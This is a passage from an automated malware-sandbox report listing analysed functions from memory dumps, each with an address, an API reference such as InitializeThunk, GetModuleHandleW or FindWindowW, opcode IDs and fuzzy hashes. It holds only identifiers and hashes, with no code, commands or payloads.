                                                            • Instruction Fuzzy Hash: F162FD78A09228CFCB64DF70C88869DB7B6BF88305F6085E9D50AA7344DB359E85CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A471F2, Relevance: 2.1, APIs: 1, Instructions: 623libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 99df4e4e2893c3dae3eb02805bd7fb8c0628cc7de0f8b3eaf07cc7fbbabbf307
                                                            • Instruction ID: ad8641d1e14d9c87ab13051ac3c5ec84b4901d4f27fa53e4c8748052d042503d
                                                            • Opcode Fuzzy Hash: 99df4e4e2893c3dae3eb02805bd7fb8c0628cc7de0f8b3eaf07cc7fbbabbf307
                                                            • Instruction Fuzzy Hash: DD52ED78A09228CFCB64DF70C88869DB7B6BF88305F6085E9D50AA7344DB359E85CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A47239, Relevance: 2.1, APIs: 1, Instructions: 614libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 1bc5a320eda7eb9ae903c550b3e751ba03d02f5052fbf52713417e1cb729dd6d
                                                            • Instruction ID: f470f2e222699e5532a1e68c77417826527f1933aca558a12f6fb1b5d0857f4d
                                                            • Opcode Fuzzy Hash: 1bc5a320eda7eb9ae903c550b3e751ba03d02f5052fbf52713417e1cb729dd6d
                                                            • Instruction Fuzzy Hash: BD52ED78A09228CFCB64DF70C88869DB7B6BF88305F6085E9D50AA7344DB359E85CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A47277, Relevance: 2.1, APIs: 1, Instructions: 609libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 5fcdd5c6de95a8c4fdb05046f9547b09856ca9a96ec01666a6da757aea102034
                                                            • Instruction ID: 5f79ca30f66bcde57b0f6daebad1749a068e668e049dfa7d4b494e00f886ea04
                                                            • Opcode Fuzzy Hash: 5fcdd5c6de95a8c4fdb05046f9547b09856ca9a96ec01666a6da757aea102034
                                                            • Instruction Fuzzy Hash: C352FC78A09228CFCB64DF70C88869DB7B6BF88305F6085E9D50AA7344DB359E85CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A472BE, Relevance: 2.1, APIs: 1, Instructions: 600libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 40ccbc75a4c5d95a3a7d19b230f0999fe0170acbb5d3487baab8ecf45e6b5a92
                                                            • Instruction ID: d3b8287a561d1a652bcde9c3753f09eb28e5e5d18614e76201b3e1e688bf443f
                                                            • Opcode Fuzzy Hash: 40ccbc75a4c5d95a3a7d19b230f0999fe0170acbb5d3487baab8ecf45e6b5a92
                                                            • Instruction Fuzzy Hash: 8252EC78A09228CFCB64DF70C88869DB7B6BF88305F6085E9D50AA7344DB359E85CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A472FC, Relevance: 2.1, APIs: 1, Instructions: 593libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: f2b06b696846ca096e2e29ae492e5d411b2d956d70870f2b89fe25cdebe9a51e
                                                            • Instruction ID: 85fa7b5e517ba8ba0ae73e57952423a30038951e494deffc6cf0d3d66588ece0
                                                            • Opcode Fuzzy Hash: f2b06b696846ca096e2e29ae492e5d411b2d956d70870f2b89fe25cdebe9a51e
                                                            • Instruction Fuzzy Hash: 2A52DB78A09228CFCB64DF70C88869DB7B6BF88305F6085E9D50AA7344DB359E85CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A4733A, Relevance: 2.1, APIs: 1, Instructions: 588libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 43cede90f29459b970bfb365b3931cde3d111dd6160d954193aaf2b32480cd45
                                                            • Instruction ID: 58164b569a9386e3481e9dff9638d1b567b7bef0504aad0f20d120c6c64816e6
                                                            • Opcode Fuzzy Hash: 43cede90f29459b970bfb365b3931cde3d111dd6160d954193aaf2b32480cd45
                                                            • Instruction Fuzzy Hash: FE52EC78A09228CFCB64DF70C88869DB7B6BF88305F6085E9D50AA7344DB359E85CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A47381, Relevance: 2.1, APIs: 1, Instructions: 581libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 65b975727898f8286351aae5040bfc1ba6210b76e843f0f54e7e5dff53f8ed8e
                                                            • Instruction ID: 1e2ffb9227aea46e1c4fff0a9a501203a4e613a4c58b11b1c0ff303b9ec7daaa
                                                            • Opcode Fuzzy Hash: 65b975727898f8286351aae5040bfc1ba6210b76e843f0f54e7e5dff53f8ed8e
                                                            • Instruction Fuzzy Hash: CB52EC78A09228CFCB64DF70C88869DB7B6BF88305F6085E9D50AA7344DB359E85CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A473C8, Relevance: 2.1, APIs: 1, Instructions: 574libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 350b3ed455f6b48438e5aa7913511f23bd077cb8dbfbd755993793241364aedc
                                                            • Instruction ID: f6888d0c17e780b03bfab9c2d213d360461fff8c33cfceee767868ff24b1b4a5
                                                            • Opcode Fuzzy Hash: 350b3ed455f6b48438e5aa7913511f23bd077cb8dbfbd755993793241364aedc
                                                            • Instruction Fuzzy Hash: B042EB78A09228CFCB64DF70C88869DB7B6BF88305F6085E9D50AA7344DB359E85CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A4740F, Relevance: 2.1, APIs: 1, Instructions: 567libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 7c3aca2924f39c7b77ba4d7a86a30ccf35ce346f96a2201322a4b95aa47f75eb
                                                            • Instruction ID: 485d133c3715540618f3b95d963d34056cd074c2613420b4c1b22de6ffb39b3d
                                                            • Opcode Fuzzy Hash: 7c3aca2924f39c7b77ba4d7a86a30ccf35ce346f96a2201322a4b95aa47f75eb
                                                            • Instruction Fuzzy Hash: 4142FB78A09228CFCB64DF70C88869DB7B6BF88305F6085E9D50AA7344DB359E85CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A47456, Relevance: 2.1, APIs: 1, Instructions: 560libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 0eef4f2d1b820974fe1a8ecc88dc1c8c520aa4580def42f52eb298fe1a2ebde3
                                                            • Instruction ID: f73a1f7282ffedad3dbcc986f6f3e40fe1433649a46142fc21c07210f413b940
                                                            • Opcode Fuzzy Hash: 0eef4f2d1b820974fe1a8ecc88dc1c8c520aa4580def42f52eb298fe1a2ebde3
                                                            • Instruction Fuzzy Hash: E242FB78A09228CFCB64DF70C88869DB7B6BF88305F6085E9D50AA7344DB359E85CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A4749D, Relevance: 2.1, APIs: 1, Instructions: 551libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 3acaa60a8b3e366631ea8093920741c3dc98ec6b38dfcdc968c8384d536edc8d
                                                            • Instruction ID: 53963b1e1d241a4b356c8db4cc7964aa140563c711a0d928d97b079bc2b49570
                                                            • Opcode Fuzzy Hash: 3acaa60a8b3e366631ea8093920741c3dc98ec6b38dfcdc968c8384d536edc8d
                                                            • Instruction Fuzzy Hash: FE42FA78A09228CFCB64DF70C88869DB7B6BF88305F6085E9D50AA7344DB359E85CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A474DB, Relevance: 2.0, APIs: 1, Instructions: 546libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 1f4bfaae4937e7c0ed99e04ebc2eeb375713067a496b83a5e301b07886cdbc30
                                                            • Instruction ID: a047f0262b794edb2ab2f862d1286e279d2a126db9fa3a86f225c47dc434760f
                                                            • Opcode Fuzzy Hash: 1f4bfaae4937e7c0ed99e04ebc2eeb375713067a496b83a5e301b07886cdbc30
                                                            • Instruction Fuzzy Hash: 9542FA78A09228CFCB64DF70C88869DB7B6BF88305F6085E9D50AA7344DB359E85CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A47522, Relevance: 2.0, APIs: 1, Instructions: 539libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: d6c04ebc2c431e40caca1cc28b67c34be2dc413630ca3eaeff7fa37c42bf89da
                                                            • Instruction ID: b2fadc28ffd307020df7c0cd1d6ff665f713b2034ebaf25ea143c55e5df86ce1
                                                            • Opcode Fuzzy Hash: d6c04ebc2c431e40caca1cc28b67c34be2dc413630ca3eaeff7fa37c42bf89da
                                                            • Instruction Fuzzy Hash: 6B42FA78A09228CFCB64DF70C88869DB7B6BF88305F6085E9D50AA7344DB359E85CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A47569, Relevance: 2.0, APIs: 1, Instructions: 532libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 3d4e904f459abcf68dc28512fe4643b75501e814393486c43c8d2c7cc1b2272d
                                                            • Instruction ID: 62afc1152380cc006921b76b135157233943325de8f3a6a7288915912cb843c1
                                                            • Opcode Fuzzy Hash: 3d4e904f459abcf68dc28512fe4643b75501e814393486c43c8d2c7cc1b2272d
                                                            • Instruction Fuzzy Hash: 7042F978A09228CFCB64DB70C88879DB7B6BF88305F6085E9D50AA3345DB359E85CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A475B0, Relevance: 2.0, APIs: 1, Instructions: 525libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: e06461f03adf7e7f05b1cc5fbe37ac86150f5f448bbdb9628ddca582b50fccf4
                                                            • Instruction ID: 9a108c624056d0a22c6afbc81b739b7a37c3872f3149a528cc7d0ac0bd596f3a
                                                            • Opcode Fuzzy Hash: e06461f03adf7e7f05b1cc5fbe37ac86150f5f448bbdb9628ddca582b50fccf4
                                                            • Instruction Fuzzy Hash: 8132F978A09228CFCB64DB70C88879DB7B6BF88305F6085E9D50AA3345DB359E85CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A475F7, Relevance: 2.0, APIs: 1, Instructions: 518libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: b459d6e0768c075933530084435b959e15b395ea4e3d081ff8b0284cc1a1524c
                                                            • Instruction ID: 7f2a2f399496bee4deea2b4fa5e80ab6eab838b48690ff39992e7b5a4b7cd40e
                                                            • Opcode Fuzzy Hash: b459d6e0768c075933530084435b959e15b395ea4e3d081ff8b0284cc1a1524c
                                                            • Instruction Fuzzy Hash: E532F978A09228CFCB64DB70C88879DB7B6BF88305F6085E9D50AA3345DB359E85CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A4763E, Relevance: 2.0, APIs: 1, Instructions: 511libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: ef7e941bada1458dac4b2249f42a0177ae362bca83a83e70fb982da33abb153d
                                                            • Instruction ID: d3c7b2f045cb5ffbe100becfac3aeac2e0dc26facca6e78dcc21cb098209fe7a
                                                            • Opcode Fuzzy Hash: ef7e941bada1458dac4b2249f42a0177ae362bca83a83e70fb982da33abb153d
                                                            • Instruction Fuzzy Hash: 8332F978A09228CFCB64DB70C88879DB7B6BF88305F6085E9D50AA3345DB359E85CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A47685, Relevance: 2.0, APIs: 1, Instructions: 504libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: cd79d9e6398c41e4729ebf5b5a7dd1ece8028e7be9e13a3bdf88efe3e0fb3dae
                                                            • Instruction ID: 5e7e7801c71b21db36f4cc564f7be6f57177e416e1383b9a102858977507bdf1
                                                            • Opcode Fuzzy Hash: cd79d9e6398c41e4729ebf5b5a7dd1ece8028e7be9e13a3bdf88efe3e0fb3dae
                                                            • Instruction Fuzzy Hash: 3B32F978A09228CFCB64DB70C88879DB7B6BF88305F6085E9D50AA3345DB359E85CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A476CC, Relevance: 2.0, APIs: 1, Instructions: 497libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 32598ee02f9cb5ae644658c7a9e1b41a91886a0cd7d2f8e92df7c7ef4ae06497
                                                            • Instruction ID: 8cb4ba874e10b27e5c07ed9bb484f47c17efa4b761990e7b97d750fa39387c23
                                                            • Opcode Fuzzy Hash: 32598ee02f9cb5ae644658c7a9e1b41a91886a0cd7d2f8e92df7c7ef4ae06497
                                                            • Instruction Fuzzy Hash: 3432F978A09228CFCB64DB70C88879DB7B6BF88305F6085E9D50AA3345DB359E85CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A47713, Relevance: 2.0, APIs: 1, Instructions: 490libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 137cb6079d3fccbe2899d14388a65a4ec3aee425d9359d4b1c12e2ddd051aba2
                                                            • Instruction ID: 901ac47930057a7d7c2fd7dc4042151c4192c23f8196fd0029c96daad3e37fe3
                                                            • Opcode Fuzzy Hash: 137cb6079d3fccbe2899d14388a65a4ec3aee425d9359d4b1c12e2ddd051aba2
                                                            • Instruction Fuzzy Hash: 1232F978A09228CFCB64DB70C88879DB7B6BF88305F6085E9D50AA3345DB359E85CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A4775A, Relevance: 2.0, APIs: 1, Instructions: 481libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 57326af5b8822e06f7d4cec34be798fe60aed07a60db77241bba86e5102df7ea
                                                            • Instruction ID: f2c60a144c1825d7256bfb6f35a5c99daf7e66ec8878b7e9ca89a55076edf97b
                                                            • Opcode Fuzzy Hash: 57326af5b8822e06f7d4cec34be798fe60aed07a60db77241bba86e5102df7ea
                                                            • Instruction Fuzzy Hash: 8B22F978A08228CFCB64DB70C88879DB7B6BF88305F6085E9D50AA3345DB359E85CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A477AE, Relevance: 2.0, APIs: 1, Instructions: 472libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: c263c7724899cffd198f1909fe9e232cee72aef989ee9f688a3eb24ca6ec3e48
                                                            • Instruction ID: 4ae6d2cb22bba9e86e0b86555327c5388b920d718d45501f2f32b8e1b0d4d5b3
                                                            • Opcode Fuzzy Hash: c263c7724899cffd198f1909fe9e232cee72aef989ee9f688a3eb24ca6ec3e48
                                                            • Instruction Fuzzy Hash: C4220978A08228CFCB64DB70C88879DB7B6BF88305F6085E9D50AA3345DB359E85CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A477F5, Relevance: 2.0, APIs: 1, Instructions: 465libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 673ccbf472c4eabf7800176991bc6095cc87e8811336df380bc14f6c7c68059a
                                                            • Instruction ID: eba9766a18ba5b7865c12e1a22c02731c97ce97af88e1bcddbfca020a3662334
                                                            • Opcode Fuzzy Hash: 673ccbf472c4eabf7800176991bc6095cc87e8811336df380bc14f6c7c68059a
                                                            • Instruction Fuzzy Hash: 6B22F878A08228DFCB64DB70C88879DB7B6BF88305F6085E9D50AA3345DB359E85CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A4783C, Relevance: 2.0, APIs: 1, Instructions: 458libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: b293024023152c3ec5ea35d33868b0d3730f502dab18d417a0f01260c597ed00
                                                            • Instruction ID: eb8f195c37802a94084419c41fb7cc7eb32fe641cd74e945810f573e0e50ff00
                                                            • Opcode Fuzzy Hash: b293024023152c3ec5ea35d33868b0d3730f502dab18d417a0f01260c597ed00
                                                            • Instruction Fuzzy Hash: F322F878A08228DFCB64DB70C88879DB7B6BF88305F6085E9D50AA3345DB359E85CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A47883, Relevance: 2.0, APIs: 1, Instructions: 451libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 8f76d6c492928ee794f6ec73d2811f9d1cf6a49429cc587d6d19ff9cf1db61a0
                                                            • Instruction ID: 3dd1938e2b353068527aeacd1d2105247f47fccc4a4086095276a93b5680d47c
                                                            • Opcode Fuzzy Hash: 8f76d6c492928ee794f6ec73d2811f9d1cf6a49429cc587d6d19ff9cf1db61a0
                                                            • Instruction Fuzzy Hash: C422F878A08228DFCB64DB70C88879DB7B6BF88305F6085E9D50AA3345DB359E85CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A478CA, Relevance: 1.9, APIs: 1, Instructions: 444libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: fe009a1fe6fefef4d139a28c1ea5c2e123645bd66b549b2483381fcc0c87b7f3
                                                            • Instruction ID: 3b78e98099e5ff28c8dc8df09c054c69e3eabae1bd9e8f094dd3eccc43286a67
                                                            • Opcode Fuzzy Hash: fe009a1fe6fefef4d139a28c1ea5c2e123645bd66b549b2483381fcc0c87b7f3
                                                            • Instruction Fuzzy Hash: D112F878A08228DFCB64DB70C88879DB7B6BF88305F6085E9D50AA3345DB359E85CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A47911, Relevance: 1.9, APIs: 1, Instructions: 437libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 690ce582722bedf8be3115156667562b4a7cc55c6cbab1b859dcc8effaa9cb48
                                                            • Instruction ID: b3b929e42ddd7765d317de70c1c46bd2ff4b6db56a79e32aa3e164a1cd175d97
                                                            • Opcode Fuzzy Hash: 690ce582722bedf8be3115156667562b4a7cc55c6cbab1b859dcc8effaa9cb48
                                                            • Instruction Fuzzy Hash: E9120878A08228DFCB64DB70C88879DB7B6BF88305F6085E9D50AA3345DB359E85CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A4795B, Relevance: 1.9, APIs: 1, Instructions: 430libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: ccce885bb5795c814204775e3fc65cdda950566bafd6e9d4ad96815b0045b69e
                                                            • Instruction ID: 25a2a370a99e205d32d96d0cff0bf3a315cf719a9b418ca01dd596b4bb8f69a7
                                                            • Opcode Fuzzy Hash: ccce885bb5795c814204775e3fc65cdda950566bafd6e9d4ad96815b0045b69e
                                                            • Instruction Fuzzy Hash: AA120878A08228DFCB64DB70C88879DB7B6BF88305F6085E9D50AA3345DB359E85CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A479A5, Relevance: 1.9, APIs: 1, Instructions: 423libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 3671ab0dc6d6cf1fe1207b222a5a373067876d6e02ce6d102a942ee4ea4592c9
                                                            • Instruction ID: f0c03fc35308ac40fc46188c15c69d1a78b94ddea5c1e9396745e576851c67fc
                                                            • Opcode Fuzzy Hash: 3671ab0dc6d6cf1fe1207b222a5a373067876d6e02ce6d102a942ee4ea4592c9
                                                            • Instruction Fuzzy Hash: AD121978A08228DFCB64DB70C88879DB7B6BF88305F6085E9D50AA3345DB359E85CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1D9E53F0, Relevance: 1.8, APIs: 1, Instructions: 290COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 1D9E57B6
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5657217630.000000001D9E0000.00000040.00000001.sdmp, Offset: 1D9E0000, based on PE: false
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: c4a414f816bf0f0b1558dc15b5578be2e3e89f71fdcaa0c0b87affcfdddaa786
                                                            • Instruction ID: 8bf7783abde8806a1bc437505e4d3aa25cc7310d8555c3ac89d84d585341c3aa
                                                            • Opcode Fuzzy Hash: c4a414f816bf0f0b1558dc15b5578be2e3e89f71fdcaa0c0b87affcfdddaa786
                                                            • Instruction Fuzzy Hash: F0B19C74A007158FCB46DFB9C48096EB7F9FF88614B518A2DC50ADB761EB35F8018B92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DA4A20, Relevance: 1.7, APIs: 1, Instructions: 180libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5637894406.0000000000DA0000.00000040.00000010.sdmp, Offset: 00DA0000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 48bff8c45212d407163dce25a30c377b5cc54c191cd3f8fff09cbfb831e64626
                                                            • Instruction ID: 964bcfdfa21d571203181a536724930fd9ca9faff8c08ad3eca12408f522c057
                                                            • Opcode Fuzzy Hash: 48bff8c45212d407163dce25a30c377b5cc54c191cd3f8fff09cbfb831e64626
                                                            • Instruction Fuzzy Hash: 9861AE34A05219DFCB14DFB4C5897AE77F2AF85354F108828E406AB381DFB8D845CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00F1D717, Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindWindowW.USER32(00000000,00000000), ref: 00F1FB06
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5639780424.0000000000F10000.00000040.00000010.sdmp, Offset: 00F10000, based on PE: false
                                                            Similarity
                                                            • API ID: FindWindow
                                                            • String ID:
                                                            • API String ID: 134000473-0
                                                            • Opcode ID: be0960591c62f7aa94cde180f88e9dfc27c0d8d211e305885a2408f5d512123c
                                                            • Instruction ID: 7b4d9add4e58a07c36b020e17d29ac0b15e2819fbb78f4894ace896c81945b61
